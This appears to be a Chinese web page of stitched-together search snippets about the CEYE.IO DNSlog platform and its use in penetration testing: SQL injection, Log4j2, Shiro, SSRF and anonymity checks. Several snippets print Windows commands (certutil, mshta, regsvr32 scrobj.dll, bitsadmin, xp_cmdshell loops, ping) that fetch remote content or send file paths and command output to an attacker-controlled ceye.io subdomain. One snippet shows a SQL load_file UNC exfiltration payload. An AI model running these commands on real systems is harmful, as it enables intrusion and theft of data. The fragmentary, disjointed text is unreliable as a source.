3、如何使用 登录 CEYE.IO,在用户详情页(http://ceye.io/profile)可以看到自己的域名标识符 identifier,对于每个用户,都有唯一的域名标识符如 abcdef.ceye.io...CEYE.IO平台提供了一台DNS Server来解析域名。...它的 nameserver address 被设置为自己的服务器IP,因此所有关于ceye.io 的域名的DNS查询最终都会被发送到CEYE的DNS服务器。...更多的Playload信息可以登录 CEYE.IO 平台获取。...在后台,CEYE.IO平台将记录客户端请求的URL,远程IP地址,Http Method,Data,User Agent,Content Type等信息。
curl http://******.ceye.io mshta http://******.ceye.io certutil -urlcache -split -f http://******.ceye.io...regsvr32 /s /n /u /i:http://******.ceye.io scrobj.dll powershell (Invoke-WebRequest -Uri "http://***...***.ceye.io") bitsadmin /rawreturn /transfer n "http://******.ceye.io" "D\1.txt" (2) 查看当前权限 首先测试了以下命令...temp\beacon.exe 查看文件: for+/r+C:\+%i+in+(beacon.exe*)+do+certutil+-urlcache+-split+-f+http://******.ceye.io.../%i 查看路径: for+/F+%i+in+('dir+/b+c:\windows\temp\')+do+certutil+-urlcache+-split+-f+http://******.ceye.io
我的个人博客:teamssix.com 我的个人公众号:TeamsSix -c :输入要执行的命令 -h :查看帮助 -k : 输入自定义的key,不输入此参数时将遍历尝试默认key -t :输入你的ceye.io...python3 shiro-check-rce.py (-c) [-h] [-k] [-t] (-u) 1、漏洞检测 该功能需要你有一个http://ceye.io.../的账号,在http://ceye.io/profile页面,找到自己的Identifier值和API Token值。
需要目标机器时windows系统 DnsLog盲注 DnsLog盲注原理 Dnslog平台:http://ceye.io/ http://ceye.io/profile curl mzq83x.ceye.io
log4j2burpscanner 0x02 加载完插件后,如果提示默认dnslog可以访问https://log.xn--9tr.com,则可以不用设置其他dnslog 0x03 如果默认dnslog访问不了,那么就需要去配置ceye.io...,记得将isceye设置为true,然后填上token、ceye.io的地址,保存配置 0x04 如果需要内网dnslog,那么将isceye设置为false, 将内网dnslog填入privatednslogurl...主要是三个模块 dnslog configuration 0x01 log4j2 Passive Scanner 为被动扫描开关,勾选就会进行被动扫描,不勾选就不会扫描 0x02 isuseceye 是否使用ceye.io...的平台 0x03 ceyetoken ceye.io的用户token 0x04 ceyednslog ceye.io的用户记录域名 0x05 isuseprivatedns 是否使用自定义dnslog
然后注册一个ceye.io的账号,作为dns注入的平台 ? ? 用到的东西呢就是下图中画圈的 ?...这是一个域名: 分析一下: Ceye.io 就不用说了, 前面的 xxxx.ceye.io是你的个人域名 Dns注入最后的效果呢就是在xxxx.ceye.io前面显示你注入的结果。
公共dnslog平台 ceye.io dnslog.cn burpcollaborator.net https://log.咕.com/ 搭建dnslog平台 Github:https://github.com
DNSlog外带数据注入 用到的网站 http://dnsbin.zhack.ca/ http://dnslog.cn/ http://ceye.io/ pyload: 查库 http://192.168.232.128
使用以下三个网址进行匿名性检测: https://www.astrill.com/zh/V**-leak-test https://whoer.net/zh http://ceye.io/ 通过测试直观地显现出不同平台...Windows 10平台 在我的物理机 windows10本地启用 小飞机之后,我们分别从几个测试平台获得了IP匿名性测试结果: astrill.com: whoer.net: ceye.io...Parrot Linux平台 在我的虚拟机 ParrotLinux启用 小飞机之后,我们分别从几个测试平台获得了IP匿名性测试结果: astrill.com: whoer.net: ceye.io...whoer.net: ceye.io和astrill检测是正常的,没有泄露信息,但是从whoer.net的结果看来:泄露了时区,语言等信息。
同时我们也可以通过使用这种方式将找到的网站绝对路径给外带出来,http://ceye.io。...xp_cmdshell 'cmd /c for /r C:\ProgramData\ %i in (beacon.exe*) do certutil -urlcache -split -f http://******.ceye.io
言归正传,如果这是一个漏洞点,那我们怎么用呢,最简单的方法,CEYE.IO。CEYE是一个用来检测带外流量的监控平台,如DNS查询和HTTP请求。...用法也很简单,登录 CEYE.IO,在用户详情页可以看到自己的域名标识符identifier,对于每个用户,都有唯一的域名标识符abcdef.ceye.io 。...那么这种地方,也是可能存在SSRF的,不过当我们输入ceye.io却发现并没有回显请求,这是因为这种地方一般会对后缀做一个检测,如果不是jpg或者其他图片后缀的话并不会通过,不过好在ceye.io是很强大的
安装Module 运行Medusa所需要导入的包 DNSLOG 由于搭建的DNSLOG不支持某些协议所以,接下来请使用http://ceye.io/ 中的DNSLOG(等后续会调回来) #打开根目录下的这个文件...(Medusa目录 vim config.py 把dns_log_url和dns_log_key分别改成你的http://ceye.io/ 里面的Identifier和API Token值 0x002
此处使用ceye.io ? ? 0x04修复建议 打补丁。 投稿邮箱:cvebug@163.com
0x02 Dnslog 常用dnslog平台:dnslog.cn、dig.pm、ceye.io,各有利弊吧。当然,如果大家不想用这些免费的也可以通过以下几个开源项目去自行搭建。...findstr /L /V CERTIFICATE temp1>temp2 HTTP外带执行结果: for /F %i in ('type temp2') do ping -n -1 %i.***.ceye.io
(1)登录ceye.io,可以查看当前的dnslog。 (2)对比burp参数注入的payload和dnslog请求,可初步确认参数username存在Log4j2 RCE漏洞。
其实有现成的服务:http://ceye.io 有一个分配给你的二级域名▲ 在数据库中输入 select load_file(“\\tangxiaofeng.1odz7u.ceye.io\aaa”)
(要通过dns请求即可通过ping命令,也能通过curl命令,只要对域名进行访问,让域名服务器进行域名解析就可实现) 例:大家可以去ceye.io注册个账号,注册完后会给一个域名,如果有域名解析请求会有记录
www.lifewire.com/unc-universal-naming-convention-818230 接受DNS请求的DNSlog平台: http://www.dnslog.cn http://ceye.io...也可以自己手动搭建,工具地址:https://github.com/bugscanteam/dnslog/ 本地环境复现: 在ceye.io申请一个账号 ?
选择使用 ceye.io 进行漏洞检测 可以不进行任何配置,配置文件中已经预置了 CEYE 域名和对应的 Token,当然也可以对其进行修改。
领取专属 10元无门槛券
手把手带您无忧上云